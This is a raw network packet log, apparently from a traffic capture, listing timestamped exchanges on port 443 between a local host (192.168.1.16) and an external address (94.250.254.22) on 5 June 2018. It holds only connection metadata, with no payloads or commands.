Jun 5, 2018 11:07:13.967109919 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.967161894 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.968355894 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.968369007 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.968377113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.968539000 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.968575001 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.969408989 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.969552994 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.969587088 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.978858948 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.978902102 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.978919029 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.978949070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.979115963 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.979160070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.979191065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.979222059 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.979595900 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.979624987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980617046 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980631113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980716944 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980746984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980757952 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.980914116 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.980962992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990483999 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990504026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990511894 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990598917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990609884 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990617990 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990628958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990817070 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.990910053 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990932941 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991393089 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.991952896 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991982937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991995096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992125034 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992141008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992151976 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992165089 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992177963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992257118 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.992311001 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992331982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992347956 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993338108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993341923 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.993374109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993904114 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.998387098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998404026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998409986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998646021 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.001301050 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001331091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001342058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001460075 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.006302118 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006331921 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006345987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006362915 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006386995 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006489038 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006511927 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006542921 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.006588936 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.008945942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.008963108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.009114027 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.009154081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.014741898 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.017601967 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017621994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017627954 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017859936 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.022759914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022777081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022782087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022789955 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022795916 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022903919 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022914886 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023040056 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.023072004 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023607016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023639917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023780107 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.023822069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025679111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025711060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025950909 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.025991917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030142069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030175924 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030383110 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.030426025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.032963991 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.032989025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.033214092 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.033257961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042125940 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042171001 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042191982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042205095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042228937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042402983 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042402029 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.042424917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042458057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042665005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042686939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042840958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042855024 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.042859077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042884111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042901993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042917013 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042953014 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043147087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043162107 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043167114 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043286085 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.043334961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043355942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043370008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043390036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043401957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043409109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043415070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.044747114 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.044795036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.045001030 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.045048952 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.047092915 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.054428101 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054466963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054485083 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054498911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054524899 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054651022 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054670095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054709911 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.054759026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055197001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.055639982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055676937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055689096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055819035 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055839062 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055876970 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.055913925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.056519985 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.057193041 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.057235956 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.057457924 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.065994978 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066035986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066046953 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066068888 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066083908 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066289902 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.066346884 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.068799973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.068846941 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.069077969 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.069138050 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078599930 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078633070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078649998 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078655958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078784943 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078797102 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078813076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078932047 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.079004049 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.079973936 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.079999924 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080100060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080101967 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080121040 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080144882 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080173016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080192089 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080208063 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080378056 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080502987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080519915 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080545902 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080593109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080600023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080604076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080677986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080686092 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080698013 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080791950 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080810070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081120968 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.081163883 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081310034 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081872940 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.082019091 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.082045078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089862108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089885950 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089905024 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089912891 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089972973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089993000 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090015888 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090065956 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.090105057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090503931 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.091947079 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.091965914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.091974974 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092058897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092063904 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.092072964 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092080116 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092097998 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092135906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092140913 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092607021 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.092627048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092664957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092978001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.093004942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103137016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103167057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103176117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103184938 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103262901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103281975 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103298903 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103338957 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.103378057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103739023 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.104938984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.104969978 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.104984045 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105076075 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105108976 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105179071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105207920 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105226040 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105242968 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105359077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105372906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105382919 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105479002 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105513096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105643988 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105981112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.106013060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.106164932 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.106199026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114454031 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114497900 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114514112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114533901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114641905 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.114669085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114689112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114717007 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.115080118 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.115099907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116595984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116631985 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116791964 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116821051 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116833925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116841078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116846085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116919994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117023945 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.117048025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117058992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117065907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117222071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117244959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117470980 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.117491961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120273113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120316029 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120374918 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.120395899 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126701117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126733065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126746893 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126790047 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126818895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126838923 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.126868010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126939058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.126970053 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127795935 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127841949 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127870083 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.127989054 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.128046989 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128076077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128097057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128113985 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128127098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128144979 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128410101 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128448009 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128463984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128480911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128612995 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.128663063 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.128683090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.131134987 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.131172895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138351917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138389111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138402939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138432026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138556957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138556004 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.138572931 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138592005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.138597965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139341116 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139369965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.139496088 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214442968 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214494944 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214521885 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214538097 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214555025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214580059 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214603901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214620113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214638948 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214653969 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214677095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214874983 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.214910984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214939117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214951992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.214975119 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215028048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215048075 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215066910 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215075970 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215084076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.215095997 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218028069 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.218077898 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218096018 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218105078 MESZ4474919294.250.254.22192.168.1.16
